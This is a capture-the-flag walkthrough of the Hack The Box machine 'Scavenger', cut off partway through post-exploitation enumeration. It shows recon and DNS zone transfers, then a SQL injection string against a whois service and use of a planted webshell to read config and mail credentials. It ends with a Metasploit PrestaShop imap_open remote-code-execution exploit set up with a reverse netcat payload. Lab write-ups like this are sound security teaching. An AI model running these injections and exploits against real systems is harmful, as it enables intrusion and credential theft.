HTB: Scavenger

Details

This machine is Scavenger from Hack The Box

Recon

Nmap worked very slowly, so I ran masscan first

kali@kali:~$ sudo masscan --router-ip 10.10.14.0 -p0-65535,U:0-65535 --rate=1000 -i tun0 10.10.10.155

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-23 11:54:28 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131072 ports/host]
Discovered open port 53/udp on 10.10.10.155                                    
Discovered open port 43/tcp on 10.10.10.155                                    
Discovered open port 21/tcp on 10.10.10.155                                    
Discovered open port 80/tcp on 10.10.10.155                                    
Discovered open port 25/tcp on 10.10.10.155                                    
Discovered open port 53/tcp on 10.10.10.155                                    
Discovered open port 22/tcp on 10.10.10.155

Then nmap only the open ports

kali@kali:~$ nmap -sVC -p80,25,43,53,22,21 10.10.10.155
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 17:47 GMT
Nmap scan report for scavenger.htb (10.10.10.155)
Host is up (0.023s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 df:94:47:03:09:ed:8c:f7:b6:91:c5:08:b5:20:e5:bc (RSA)
|   256 e3:05:c1:c5:d1:9c:3f:91:0f:c0:35:4b:44:7f:21:9e (ECDSA)
|_  256 45:92:c0:a1:d9:5d:20:d6:eb:49:db:12:a5:70:b7:31 (ED25519)
25/tcp open  smtp    Exim smtpd 4.89
| smtp-commands: ib01.supersechosting.htb Hello scavenger.htb [10.10.14.27], SIZE 52428800, 8BITMIME, PIPELINING, PRDR, HELP, 
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP 
43/tcp open  whois?
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest: 
|     % SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
|     more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
|     This query returned 0 object
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     % SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
|     more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
|_    1267 (HY000): Illegal mix of collations (utf8mb4_general_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like'
53/tcp open  domain  ISC BIND 9.10.3-P4 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Debian
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port43-TCP:V=7.80%I=7%D=2/23%Time=5E52BAA9%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,A9,"%\x20SUPERSECHOSTING\x20WHOIS\x20server\x20v0\.6beta@Maria
SF:DB10\.1\.37\r\n%\x20for\x20more\x20information\x20on\x20SUPERSECHOSTING
SF:,\x20visit\x20http://www\.supersechosting\.htb\r\n%\x20This\x20query\x2
SF:0returned\x200\x20object\r\n")%r(GetRequest,A9,"%\x20SUPERSECHOSTING\x2
SF:0WHOIS\x20server\x20v0\.6beta@MariaDB10\.1\.37\r\n%\x20for\x20more\x20i
SF:nformation\x20on\x20SUPERSECHOSTING,\x20visit\x20http://www\.supersecho
SF:sting\.htb\r\n%\x20This\x20query\x20returned\x200\x20object\r\n")%r(HTT
SF:POptions,A9,"%\x20SUPERSECHOSTING\x20WHOIS\x20server\x20v0\.6beta@Maria
SF:DB10\.1\.37\r\n%\x20for\x20more\x20information\x20on\x20SUPERSECHOSTING
SF:,\x20visit\x20http://www\.supersechosting\.htb\r\n%\x20This\x20query\x2
SF:0returned\x200\x20object\r\n")%r(RTSPRequest,A9,"%\x20SUPERSECHOSTING\x
SF:20WHOIS\x20server\x20v0\.6beta@MariaDB10\.1\.37\r\n%\x20for\x20more\x20
SF:information\x20on\x20SUPERSECHOSTING,\x20visit\x20http://www\.supersech
SF:osting\.htb\r\n%\x20This\x20query\x20returned\x200\x20object\r\n")%r(He
SF:lp,A9,"%\x20SUPERSECHOSTING\x20WHOIS\x20server\x20v0\.6beta@MariaDB10\.
SF:1\.37\r\n%\x20for\x20more\x20information\x20on\x20SUPERSECHOSTING,\x20v
SF:isit\x20http://www\.supersechosting\.htb\r\n%\x20This\x20query\x20retur
SF:ned\x200\x20object\r\n")%r(SSLSessionReq,103,"%\x20SUPERSECHOSTING\x20W
SF:HOIS\x20server\x20v0\.6beta@MariaDB10\.1\.37\r\n%\x20for\x20more\x20inf
SF:ormation\x20on\x20SUPERSECHOSTING,\x20visit\x20http://www\.supersechost
SF:ing\.htb\r\n1267\x20\(HY000\):\x20Illegal\x20mix\x20of\x20collations\x2
SF:0\(utf8mb4_general_ci,IMPLICIT\)\x20and\x20\(utf8_general_ci,COERCIBLE\
SF:)\x20for\x20operation\x20'like'")%r(TerminalServerCookie,103,"%\x20SUPE
SF:RSECHOSTING\x20WHOIS\x20server\x20v0\.6beta@MariaDB10\.1\.37\r\n%\x20fo
SF:r\x20more\x20information\x20on\x20SUPERSECHOSTING,\x20visit\x20http://w
SF:ww\.supersechosting\.htb\r\n1267\x20\(HY000\):\x20Illegal\x20mix\x20of\
SF:x20collations\x20\(utf8mb4_general_ci,IMPLICIT\)\x20and\x20\(utf8_gener
SF:al_ci,COERCIBLE\)\x20for\x20operation\x20'like'")%r(TLSSessionReq,103,"
SF:%\x20SUPERSECHOSTING\x20WHOIS\x20server\x20v0\.6beta@MariaDB10\.1\.37\r
SF:\n%\x20for\x20more\x20information\x20on\x20SUPERSECHOSTING,\x20visit\x2
SF:0http://www\.supersechosting\.htb\r\n1267\x20\(HY000\):\x20Illegal\x20m
SF:ix\x20of\x20collations\x20\(utf8mb4_general_ci,IMPLICIT\)\x20and\x20\(u
SF:tf8_general_ci,COERCIBLE\)\x20for\x20operation\x20'like'");
Service Info: Host: ib01.supersechosting.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.88 seconds

User

I started on http://10.10.10.155/

Screenshot 1

I could see http://www.supersechosting.htb in the nmap so I added it to hosts, I also had ib01.supersechosting.htb. With port 53 open I used dig to check for any more

kali@kali:~$ dig axfr supersechosting.htb @10.10.10.155

; <<>> DiG 9.11.14-3-Debian <<>> axfr supersechosting.htb @10.10.10.155
;; global options: +cmd
supersechosting.htb.    604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 3 604800 86400 2419200 604800
supersechosting.htb.    604800  IN      NS      ns1.supersechosting.htb.
supersechosting.htb.    604800  IN      MX      10 mail1.supersechosting.htb.
supersechosting.htb.    604800  IN      A       10.10.10.155
ftp.supersechosting.htb. 604800 IN      A       10.10.10.155
mail1.supersechosting.htb. 604800 IN    A       10.10.10.155
ns1.supersechosting.htb. 604800 IN      A       10.10.10.155
whois.supersechosting.htb. 604800 IN    A       10.10.10.155
www.supersechosting.htb. 604800 IN      A       10.10.10.155
supersechosting.htb.    604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 3 604800 86400 2419200 604800
;; Query time: 22 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Sun Feb 23 17:58:02 GMT 2020
;; XFR size: 10 records (messages 1, bytes 275)

I added those to hosts too. Then checked http://www.supersechosting.htb/

Screenshot 2

The whos thing seemed to be on port 43

kali@kali:~$ nc whois.supersechosting.htb 43

I just hit enter

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
% This query returned 0 object

It's running maria db, so I tried an SQL injection

kali@kali:~$ echo "'" | nc whois.supersechosting.htb 43
% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''') limit 1' at line 1

A bit of trial and error later

kali@kali:~$ echo "%') limit 100 #" | nc whois.supersechosting.htb 43
% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
% This query returned 4 object
   Domain Name: SUPERSECHOSTING.HTB
   Registrar WHOIS Server: whois.supersechosting.htb
   Registrar URL: http://www.supersechosting.htb
   Updated Date: 2018-02-21T18:36:40Z
   Creation Date: 1997-09-15T04:00:00Z
   Registry Expiry Date: 2020-09-14T04:00:00Z
   Registrar: SuperSecHosting Inc.
   Registrar IANA ID: 292
   Registrar Abuse Contact Email: abusecomplaints@supersechosting.htb
   Registrar Abuse Contact Phone: +1.999999999
   Name Server: NS1.SUPERSECHOSTING.HTB
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-12-05T14:11:05Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .HTB domains and
--   Domain Name: JUSTANOTHERBLOG.HTB
   Registrar WHOIS Server: whois.supersechosting.htb
   Registrar URL: http://www.supersechosting.htb
   Updated Date: 2018-02-21T18:36:40Z
   Creation Date: 1997-09-15T04:00:00Z
   Registry Expiry Date: 2020-09-14T04:00:00Z
   Registrar: justanotherblog Inc.
   Registrar IANA ID: 293
   Registrar Abuse Contact Email: abusecomplaints@supersechosting.htb
   Registrar Abuse Contact Phone: +1.999999999
   Name Server: NS1.SUPERSECHOSTING.HTB
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-12-05T14:11:05Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .HTB domains and
--   Domain Name: PWNHATS.HTB
   Registrar WHOIS Server: whois.supersechosting.htb
   Registrar URL: http://www.supersechosting.htb
   Updated Date: 2018-02-21T18:36:40Z
   Creation Date: 1997-09-15T04:00:00Z
   Registry Expiry Date: 2020-09-14T04:00:00Z
   Registrar: justanotherblog Inc.
   Registrar IANA ID: 293
   Registrar Abuse Contact Email: abusecomplaints@supersechosting.htb
   Registrar Abuse Contact Phone: +1.999999999
   Name Server: NS1.SUPERSECHOSTING.HTB
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-12-05T14:11:05Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .HTB domains and
--   Domain Name: RENTAHACKER.HTB
   Registrar WHOIS Server: whois.supersechosting.htb
   Registrar URL: http://www.supersechosting.htb
   Updated Date: 2018-02-21T18:36:40Z
   Creation Date: 1997-09-15T04:00:00Z
   Registry Expiry Date: 2020-09-14T04:00:00Z
   Registrar: justanotherblog Inc.
   Registrar IANA ID: 293
   Registrar Abuse Contact Email: abusecomplaints@supersechosting.htb
   Registrar Abuse Contact Phone: +1.999999999
   Name Server: NS1.SUPERSECHOSTING.HTB
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-12-05T14:11:05Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .HTB domains and
--

This gave me

JUSTANOTHERBLOG.HTB
PWNHATS.HTB
RENTAHACKER.HTB

So I added these to hosts too, along with their www. and ftp. counter parts as the first page indicated they may have them. I then checked them out

http://www.justanotherblog.htb/

Screenshot 3

http://www.pwnhats.htb/

Screenshot 4

http://www.rentahacker.htb/

Screenshot 5

The wordpress blog had a comment http://www.rentahacker.htb/2018/12/10/rent-a-hacker/

Screenshot 6

So they have apparently been owned. I ran dig against each of these domains again

kali@kali:~$ dig axfr justanotherblog.htb @dns.supersechosting.htb

; <<>> DiG 9.11.14-3-Debian <<>> axfr justanotherblog.htb @dns.supersechosting.htb
;; global options: +cmd
justanotherblog.htb.    604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
justanotherblog.htb.    604800  IN      NS      ns1.supersechosting.htb.
justanotherblog.htb.    604800  IN      MX      10 mail1.justanotherblog.htb.
justanotherblog.htb.    604800  IN      A       10.10.10.155
mail1.justanotherblog.htb. 604800 IN    A       10.10.10.155
www.justanotherblog.htb. 604800 IN      A       10.10.10.155
justanotherblog.htb.    604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
;; Query time: 20 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Sun Feb 23 20:59:41 GMT 2020
;; XFR size: 7 records (messages 1, bytes 233)

kali@kali:~$ dig axfr rentahacker.htb @dns.supersechosting.htb

; <<>> DiG 9.11.14-3-Debian <<>> axfr rentahacker.htb @dns.supersechosting.htb
;; global options: +cmd
rentahacker.htb.        604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 4 604800 86400 2419200 604800
rentahacker.htb.        604800  IN      NS      ns1.supersechosting.htb.
rentahacker.htb.        604800  IN      MX      10 mail1.rentahacker.htb.
rentahacker.htb.        604800  IN      A       10.10.10.155
mail1.rentahacker.htb.  604800  IN      A       10.10.10.155
sec03.rentahacker.htb.  604800  IN      A       10.10.10.155
www.rentahacker.htb.    604800  IN      A       10.10.10.155
rentahacker.htb.        604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 4 604800 86400 2419200 604800
;; Query time: 23 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Sun Feb 23 20:59:52 GMT 2020
;; XFR size: 8 records (messages 1, bytes 251)

kali@kali:~$ dig axfr pwnhats.htb @dns.supersechosting.htb

; <<>> DiG 9.11.14-3-Debian <<>> axfr pwnhats.htb @dns.supersechosting.htb
;; global options: +cmd
pwnhats.htb.            604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
pwnhats.htb.            604800  IN      NS      ns1.supersechosting.htb.
pwnhats.htb.            604800  IN      MX      10 mail1.pwnhats.htb.
pwnhats.htb.            604800  IN      A       10.10.10.155
mail1.pwnhats.htb.      604800  IN      A       10.10.10.155
www.pwnhats.htb.        604800  IN      A       10.10.10.155
pwnhats.htb.            604800  IN      SOA     ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
;; Query time: 20 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Sun Feb 23 21:00:05 GMT 2020
;; XFR size: 7 records (messages 1, bytes 225)

This gave me

sec03.rentahacker.htb

Which I added, and visited

Screenshot 7

I ran a dirbust against this

Screenshot 8

http://sec03.rentahacker.htb/shell.php Looked interesting

Screenshot 9

I ended up fuzzing this to find out if it could run commands

kali@kali:~$ wfuzz --hh 0 -c -z file,/usr/share/wordlists/wfuzz/general/common.txt http://sec03.rentahacker.htb/shell.php\?FUZZ\=id 

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://sec03.rentahacker.htb/shell.php?FUZZ=id
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload                                           
===================================================================

000000394:   200        1 L      3 W      61 Ch       "hidden"                                          

Total time: 2.402903
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 394.9389

So the param needed was hidden

http://sec03.rentahacker.htb/shell.php?hidden=id

Screenshot 12

I began to dig around into this

http://sec03.rentahacker.htb/shell.php?hidden=pwd
/home/ib01c03/sec03 

And began using view source for nicer layout

view-source:http://sec03.rentahacker.htb/shell.php?hidden=ls -la

Screenshot 13

view-source:http://sec03.rentahacker.htb/shell.php?hidden=ls%20-la%20config
total 32
drwxr-xr-x  2 ib01c03 customers  4096 Dec 10  2018 .
drwxr-xr-x 15 ib01c03 customers 12288 Dec 10  2018 ..
-rw-r--r--  1 ib01c03 customers   190 Oct 17  2018 .htaccess
-rw-r--r--  1 ib01c03 customers   309 Oct 17  2018 Web.config
-rw-r--r--  1 ib01c03 customers   334 Dec 10  2018 config_inc.php
-rw-r--r--  1 ib01c03 customers  3354 Oct 17  2018 config_inc.php.sample

view-source:http://sec03.rentahacker.htb/shell.php?hidden=cat%20config/config_inc.php
<?php
$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'ib01c03';
$g_db_username            = 'ib01c03';
$g_db_password            = 'Thi$sh1tIsN0tGut';

$g_default_timezone       = 'Europe/Berlin';

$g_crypto_master_salt     = 'DCD4OIydnPefp27q8Bu5TJHE2RfyO4Zit13B6zLfJdQ=';

I tried the creds on ssh with no luck. After a while of digging I found some emails

view-source:http://sec03.rentahacker.htb/shell.php?hidden=cat%20/var/mail/ib01c03

From support@ib01.supersechosting.htb Mon Dec 10 21:10:56 2018
Return-path: <support@ib01.supersechosting.htb>
Envelope-to: ib01c03@ib01.supersechosting.htb
Delivery-date: Mon, 10 Dec 2018 21:10:56 +0100
Received: from support by ib01.supersechosting.htb with local (Exim 4.89)
    (envelope-from <support@ib01.supersechosting.htb>)
    id 1gWRtI-0000ZK-8Q
    for ib01c03@ib01.supersechosting.htb; Mon, 10 Dec 2018 21:10:56 +0100
To: <ib01c03@ib01.supersechosting.htb>
Subject: Re: Please help! Site Defaced!
In-Reply-To: Your message of Mon, 10 Dec 2018 21:04:49 +0100
    <E1gWRnN-0000XA-44@ib01.supersechosting.htb>
References: <E1gWRnN-0000XA-44@ib01.supersechosting.htb>
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: <E1gWRtI-0000ZK-8Q@ib01.supersechosting.htb>
From: support <support@ib01.supersechosting.htb>
Date: Mon, 10 Dec 2018 21:10:56 +0100
X-IMAPbase: 1544472964 2
Status: O
X-UID: 1

>> Please we need your help. Our site has been defaced!
>> What we should do now?
>>
>> rentahacker.htb

Hi, we will check when possible. We are working on another incident right now. We just make a backup of the apache logs.
Please check if there is any strange file in your web root and upload it to the ftp server:
ftp.supersechosting.htb
user: ib01ftp
pass: YhgRt56_Ta

Thanks.

I tried these creds on ftp

kali@kali:~$ ftp 10.10.10.155
Connected to 10.10.10.155.
220 (vsFTPd 3.0.3)
Name (10.10.10.155:kali): ib01ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xrwx---    3 1005     1000         4096 Dec 10  2018 .
drwxr-xr-x    8 0        0            4096 Dec 07  2018 ..
dr-xrwx---    4 1005     1000         4096 Dec 10  2018 incidents
226 Directory send OK.

ftp> cd incidents
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xrwx---    4 1005     1000         4096 Dec 10  2018 .
dr-xrwx---    3 1005     1000         4096 Dec 10  2018 ..
dr-xrwx---    2 1005     1000         4096 Jan 30  2019 ib01c01
dr-xrwx---    2 1005     1000         4096 Dec 10  2018 ib01c03
226 Directory send OK.

Another user has an incident too. So I downloaded the files inside

ftp> get ib01c01.access.log
local: ib01c01.access.log remote: ib01c01.access.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ib01c01.access.log (10427 bytes).
226 Transfer complete.
10427 bytes received in 0.00 secs (41.9576 MB/s)

ftp> get ib01c01_incident.pcap
local: ib01c01_incident.pcap remote: ib01c01_incident.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ib01c01_incident.pcap (835084 bytes).
226 Transfer complete.
835084 bytes received in 0.70 secs (1.1340 MB/s)

ftp> get notes.txt
local: notes.txt remote: notes.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for notes.txt (173 bytes).
226 Transfer complete.
173 bytes received in 0.00 secs (4.1246 MB/s)

And checked them out

kali@kali:~$ cat notes.txt 
After checking the logs and the network capture, all points to that the attacker knows valid credentials and abused a recently discovered vuln to gain access to the server!

So there might be some creds in the pcap. So I looked for them in wireshark

Screenshot 15

This got me some details for the pwnhats site

pwnhats@pwnhats.htb : GetYouAH4t!

With an admin url of

/admin530o6uisg

I also found a potential exploit for this site https://www.rapid7.com/db/modules/exploit/linux/http/php_imap_open_rce. So I checked the site to see if it would be vulnerable http://www.pwnhats.htb/admin530o6uisg/index.php?controller=AdminLogin&token=de267fd50b09d00b04cca76ff620b201

Screenshot 16

The version is vulnerable, so I setup the exploit

msf5 > use exploit/linux/http/php_imap_open_rce
msf5 exploit(linux/http/php_imap_open_rce) > options

Module options (exploit/linux/http/php_imap_open_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /admin2769gx8k3  yes       Base directory path
   USERNAME                    no        Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   prestashop

msf5 exploit(linux/http/php_imap_open_rce) > set RHOSTS 10.10.10.155
RHOSTS => 10.10.10.155

msf5 exploit(linux/http/php_imap_open_rce) > set VHOST www.pwnhats.htb
VHOST => www.pwnhats.htb

msf5 exploit(linux/http/php_imap_open_rce) > set TARGETURI /admin530o6uisg
TARGETURI => /admin530o6uisg

msf5 exploit(linux/http/php_imap_open_rce) > set USERNAME pwnhats@pwnhats.htb
USERNAME => pwnhats@pwnhats.htb

msf5 exploit(linux/http/php_imap_open_rce) > set PASSWORD GetYouAH4t!
PASSWORD => GetYouAH4t!

msf5 exploit(linux/http/php_imap_open_rce) > set LHOST 10.10.14.27
LHOST => 10.10.14.27

However when I ran it

[-] Exploit failed: NoMethodError undefined method `code' for nil:NilClass

So I tried an alternative payload

msf5 exploit(linux/http/php_imap_open_rce) > set payload cmd/unix/generic
payload => cmd/unix/generic

msf5 exploit(linux/http/php_imap_open_rce) > set cmd id > /tmp/out
cmd => id > /tmp/out

Still no luck. As the site loaded very slowly, I tried increasing the timeouts

msf5 exploit(linux/http/php_imap_open_rce) > set HTTPClientTimeout 600
HTTPClientTimeout => 600.0

And enabling verbose mode

msf5 exploit(linux/http/php_imap_open_rce) > set VERBOSE true
VERBOSE => true

This time

msf5 exploit(linux/http/php_imap_open_rce) > run

[*] Redirected to http://www.pwnhats.htb/admin530o6uisg/
[*] Redirected to http://www.pwnhats.htb/admin530o6uisg/index.php?controller=AdminLogin&token=de267fd50b09d00b04c
[*] Token: de267fd50b09d00b04cca76ff620b201 and Login Redirect: http://www.pwnhats.htb/admin530o6uisg/&token=e44d
[*] Logging in with pwnhats@pwnhats.htb:GetYouAH4t!
[*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/www.pwnhats.htb\/admin530o6uisg\/index.php?contr
[+] Login Success, loading admin dashboard to pull tokens
[*] Customer Threads Token: 8d8e4db864318da7655c7f2d8175815f
[+] Sending Payload with Final Token: 8d8e4db864318da7655c7f2d8175815f
[*] IMAP server change left on server, manual revert required.

I then used my webshell to try and read the output

view-source:http://sec03.rentahacker.htb/shell.php?hidden=ls%20-la%20/tmp
total 12
drwxrwxrwt  2 root    root      4096 Feb 24 00:36 .
drwxr-xr-x 22 root    root      4096 Dec  4  2018 ..
-rw-r--r--  1 ib01c01 customers   61 Feb 24 00:36 out

view-source:http://sec03.rentahacker.htb/shell.php?hidden=cat%20/tmp/out
uid=1001(ib01c01) gid=1004(customers) groups=1004(customers)

So I had RCE as a second user. Although it was very slow. As such I setup a lot of enumer in one go

msf5 exploit(linux/http/php_imap_open_rce) > set cmd ls -laR /home > /tmp/out
cmd => ls -laR /home > /tmp/out

Once it was complete

view-source:http://sec03.rentahacker.htb/shell.php?hidden=cat%20/tmp/out
[SNIP]
/home/ib01c01:
total 66612
drwx------  5 ib01c01 customers     4096 Feb 24 00:18 .
drwxr-xr-x  8 root    root          4096 Dec  7  2018 ..
drwxr-xr-x  2 ib01c01 customers     4096 Feb  2  2019 ...
